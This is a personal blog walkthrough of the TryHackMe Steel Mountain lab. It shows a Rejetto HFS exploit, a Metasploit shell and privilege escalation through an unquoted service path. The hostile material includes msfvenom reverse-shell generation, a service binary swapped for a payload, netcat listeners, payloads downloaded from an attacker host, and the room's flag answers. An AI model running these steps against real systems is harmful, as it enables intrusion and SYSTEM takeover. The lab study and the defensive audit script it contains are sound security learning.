Welcome! It is time to look at the final CTF-like room on the Complete Beginner path of THM. This room is called Steel Mountain and I am excited to look at it since it is a Windows machine, which has not been covered so much. I am making these walkthroughs to keep myself motivated to learn cyber security, and to ensure that I remember the knowledge gained from THM's rooms.
Join me in learning cyber security. I will try to explain concepts as I go, to differentiate myself from other walkthroughs.
![Steel Mountain](https://www.jalblas.com/wp-content/uploads/2024/12/Udklip.png)
Steel Mountain CTF
Room URL: https://tryhackme.com/room/steelmountain
Task 1 (Introduction)
In this Steel Mountain room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.
If you don’t have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.
Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.
Questions
Deploy the machine. Who is the employee of the month?
As always, start with some nmap port scanning. I use the following command for this:
nmap -sV -sC -oN nmap.out -p- <target ip>
This provides version scanning, runs some basic scripts, scans all the ports, and writes the output to a file called nmap.out. We get the following results:
![](https://cdn-images-1.medium.com/max/800/1*rZYXEcLgFFAthuMoTk-c7w.png)
And more:
![](https://cdn-images-1.medium.com/max/800/1*3I9bOxojpUlvP0mHUaA0Jg.png)
There is a bunch of interesting stuff here. We have a website running on port 80, RPC, SMB on ports 139 and 445, and then some more HTTP-related services on 5985, 8080 and 47001. Finally, there is RDP on port 3389, which nmap lists together with its SSL/TLS certificate details.
Let’s have a look at the website first! Visit the IP address on port 80.
![](https://cdn-images-1.medium.com/max/800/1*Qqps5dI30dcdlhi_xFyraw.png)
Hmm, the employee of the month. But what about his name?
Let’s have a look at the source code:
![](https://cdn-images-1.medium.com/max/800/1*n64_KH51I-Leik6S7hzQgA.png)
The image is called BillHarper.png so I am going to guess that’s his name! 😉
Answer: Bill Harper
Task 2 (Initial Access)
Now you have deployed the machine, let's get an initial shell!
Questions
Scan the machine with nmap. What is the other port running a web server on?
Well, we already port scanned in the previous section, so we can start answering these questions 🙂
From our nmap scan we can see that there is also an HTTP FileServer (version 2.3) running on port 8080:
![](https://cdn-images-1.medium.com/max/800/1*cKxZWgd_5CRNuXaFU5V5zg.png)
Answer: 8080
Take a look at the other web server. What file server is running?
On the above screenshot we can find the following:
![](https://cdn-images-1.medium.com/max/800/1*ST5mZ3d9b5K-xMEh97eTpw.png)
HttpFileServer is not the answer though. Let’s click on that link:
![](https://cdn-images-1.medium.com/max/800/1*bZu-uuKUcV3mWfBm5hzw2g.png)
The developer is called Rejetto, and after some trial and error I figured out the answer.
Answer: Rejetto HTTP File Server.
What is the CVE number to exploit this file server?
We know the name of the file server, and that it is running version 2.3. We can therefore use the searchsploit command (or look at exploit-db’s website). I entered the following command:
searchsploit http file server -w
This gave me the following results. Note that I used the -w flag to get a link to exploit-db.
![](https://cdn-images-1.medium.com/max/800/1*yHU40BgvNTPPMtTiToenqA.png)
If you look carefully you can see that there are at least two exploits for version 2.3.x. Let’s try Remote Command Execution (1) at the following link:
On this page it mentions a CVE number, which is the correct answer!
Answer: 2014-6287
Use Metasploit to get an initial shell. What is the user flag?
Start Metasploit by running msfconsole.
The great thing about Metasploit is that we can search by CVE number. Let’s do this by running:
search 2014-6287
![](https://cdn-images-1.medium.com/max/800/1*Bie8FF_CWIPdV7C3-ETMeg.png)
We can follow this by entering use 0. This selects the module.
To see the different options we need to adjust, we can run show options.
![](https://cdn-images-1.medium.com/max/800/1*xDRprfaaAFr-g8uKOXwPrg.png)
A lot of this is already set to defaults, so the only options we have to set are RHOSTS (the target host IP address) and RPORT (the file server is on 8080, not the default). You can set them with set RHOSTS <ip> and set RPORT <port>.
Now all we need to do is enter run or exploit.
We got access to a meterpreter shell:
![](https://cdn-images-1.medium.com/max/800/1*JwKUTcWoNJbSI86R5-DNEQ.png)
Now we need to find the user flag.
We can use the following command to search for all txt files:
search -f *.txt
This gives us the following result:
![](https://cdn-images-1.medium.com/max/800/1*pv0SKzPCRCpbnVxER7s5LA.png)
Now all we need to do is read the file.
![](https://cdn-images-1.medium.com/max/800/1*73H2NIkxyTCcnpp-idAmdw.png)
Remember to use forward slashes in the path.
Answer: b04763b6fcf51fcd7c13abc7db4fd365
Task 3 (Privilege Escalation)
Now that you have an initial shell on this Windows machine as Bill (enter getuid in the meterpreter shell to see this), we can further enumerate the machine and escalate our privileges to root!
Questions
To enumerate this machine, we will use a powershell script called PowerUp, whose purpose is to evaluate a Windows machine and determine any abnormalities — “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.” You can download the script here.
Now you can use the upload command in Meterpreter to upload the script. To execute it from Meterpreter, I type load powershell into the meterpreter shell. Then I enter PowerShell by entering powershell_shell:
![](https://cdn-images-1.medium.com/max/800/1*w_f-rZcwI_xF_ZGQ3o4KCA.png)
After doing this you just have to run the PowerUp Powershell script by entering:
. .\PowerUp.ps1
Followed by:
Invoke-AllChecks
This gives a long list with abnormalities:
![](https://cdn-images-1.medium.com/max/800/1*pyeRZJWCnxBd9LD5Yv_6xQ.png)
Answer: No answer needed
Pay close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?
The name is found at the top.
Answer: AdvancedSystemCareService9
The CanRestart option being true allows us to restart a service on the system; the directory of the application is also writable. This means we can replace the legitimate application with our malicious one and restart the service, which will run our infected program!
Use msfvenom to generate a reverse shell as an Windows executable.
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe
We have now generated a reverse shell with the name ASCService.exe.
We can now leave the Powershell shell, and use the same upload command as before:
![](https://cdn-images-1.medium.com/max/800/1*m9GHxYBZB5uXiHBCl-zw8A.png)
Now we need to replace the legitimate one. Enter a regular cmd shell from your meterpreter shell by entering: shell.
Before copying, we need to stop the service by entering:
sc stop AdvancedSystemCareService9
![](https://cdn-images-1.medium.com/max/800/1*itVelXaFC_R3YoyOCyp-Og.png)
Then copy the file to the original location (the destination contains spaces, so it has to be quoted):
copy ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
![](https://cdn-images-1.medium.com/max/800/1*Zbj6Y-zTAI9-gr1BMw3T0A.png)
Now we need to start a listener!
nc -lvnp 4443
Then start the service again to get a shell as SYSTEM.
sc start AdvancedSystemCareService9
![](https://cdn-images-1.medium.com/max/800/1*XqIb1RV955hFqrqBmgvutg.png)
And we have system access!
![](https://cdn-images-1.medium.com/max/800/1*1ZevOhWd2iD-nkAh39AcOA.png)
Answer: No answer needed
What is the root flag?
You can find the root flag on the Administrator's Desktop:
![](https://cdn-images-1.medium.com/max/800/1*3PfoWCjDRdD3vSz9MxO26w.png)
Answer: 9af5f314f57607c00fd09803a587db80
Task 4 (Access and Escalation Without Metasploit)
Now it is time to use the following exploit without the use of Metasploit: https://www.exploit-db.com/exploits/39161
Questions
To begin we shall be using the same CVE. However, this time let’s use this exploit. *Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*
To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!
You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!
Let’s go over the process:
1. Download the exploit. Copy the raw text from https://www.exploit-db.com/raw/39161 and save it into a new file. I called it exploit.py.
2. Edit the port/IP in the script. Edit the script and add your attacker machine IP. You can leave the IP as is if you want.
3. Edit the port number in the script for the file server. The payload script uses port 80 for the file web server by default. This port is often in use on THM AttackBoxes, so we cannot use it for the web server we run in step 5. We therefore add port 8000 to the ip_addr variable. See the image below step 8.
4. Download a netcat static binary from https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe. It needs to be renamed to nc.exe to work with the exploit script.
5. Serve the binary by running a Python web server. In the directory containing your binary, start a simple Python web server by running: python3 -m http.server 8000
6. Start a listener. Start a simple netcat listener by entering: nc -lvnp 443
7. Run the exploit with the correct arguments. Run this command: python2 exploit.py 10.10.13.114 8080. The script is written for Python 2 and will not run under python3 without editing.
8. Run the exploit once more.
![](https://cdn-images-1.medium.com/max/800/1*JxStn3P7MieLeaoSyT380w.png)
If you have done everything right you have 3 terminal tabs open. One running the exploit, one running the python http server, and one running the netcat listener.
Answer: No answer needed
![](https://cdn-images-1.medium.com/max/800/1*W5RN_eKfzFoT_DYogX22ng.png)
Congratulations, we’re now on the system. Now we can pull winPEAS to the system using powershell -c.
Download a winPEAS binary (https://github.com/carlospolop/PEASS-ng/releases/tag/20220717) and host the Python server once more. Change directory to Bill’s desktop (see below). Then we can execute the following command in the shell we got back:
powershell -c wget "http://<attacker ip>:8000/winPEAS.exe" -outfile "winPEAS.exe"
![](https://cdn-images-1.medium.com/max/800/1*gYgqwyLoaiajvEpcaidveQ.png)
Once we run winPEAS (simply enter winPEAS.exe), we see that it points us towards unquoted service paths, and it also gives us the name of the service that is running from that path.
![](https://cdn-images-1.medium.com/max/800/1*aqWv1cWvqLpRhDM9hK9L1A.png)
We see the same vulnerability as we did when we used Metasploit!
What powershell -c command could we run to manually find out the service name? *Format is “powershell -c “command here”*
Answer: powershell -c Get-Service
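Get-Service shows the names but not the binary paths, which is what PowerUp (Task 3) and winPEAS (here) actually inspect. As an added audit example, not code from the room, PowerUp or winPEAS, the function below reproduces that unquoted-service-path check from the defender's side and prints the sc.exe line that fixes each finding. It assumes an elevated PowerShell prompt on the host being audited; the function name is my own.

```powershell
# Added audit example, not part of the room, PowerUp or winPEAS.
# Reports services whose ImagePath is unquoted and contains a space, the
# condition both tools flagged for AdvancedSystemCareService9, and prints the
# sc.exe line that quotes the path. Assumes an elevated PowerShell prompt.
function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()

    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { continue }
        # A path that already starts with a quote is safe.
        if ($path.StartsWith('"')) { continue }
        # Separate the executable from any arguments: everything up to the first ".exe".
        $m = [regex]::Match($path, '^(.*?\.exe)', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)
        if (-not $m.Success) { continue }
        $exe  = $m.Groups[1].Value
        $tail = $path.Substring($exe.Length)
        # Only a space in the unquoted part makes Windows try shorter prefixes
        # such as "C:\Program.exe" or "C:\Program Files (x86)\IObit\Advanced.exe".
        if ($exe -notmatch ' ') { continue }

        [PSCustomObject]@{
            Name        = $svc.Name
            StartMode   = $svc.StartMode
            RunAs       = $svc.StartName
            ImagePath   = $path
            # sc.exe needs the inner quotes escaped as \" so the path is stored quoted.
            Remediation = 'sc.exe config "{0}" binPath= "\"{1}\"{2}"' -f $svc.Name, $exe, $tail
        }
    }
}

# Run the check and show the findings; an empty table means no unquoted paths.
Get-UnquotedServicePath | Format-Table -AutoSize -Wrap
```

Quoting the path removes the lookup ambiguity, but the second half of the finding in Task 3 (a writable service directory and a CanRestart permission for a low-privileged user) still needs the directory ACL and the service's start/stop permissions tightened.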
Now let’s escalate to Administrator with our new found knowledge. Generate your payload using msfvenom and pull it to the system using powershell.
I am leaving this to you, as the process is very similar to when we used Metasploit!
Answer: No answer needed
Wow, we are done with Steel Mountain!
Task 3 and Task 4 were quite tricky in my opinion, but I have tried to explain the concepts as well as I could. I gained a lot more knowledge and I hope you can say the same. Anyway, I’m out! Please send a few claps if you don’t mind 🙂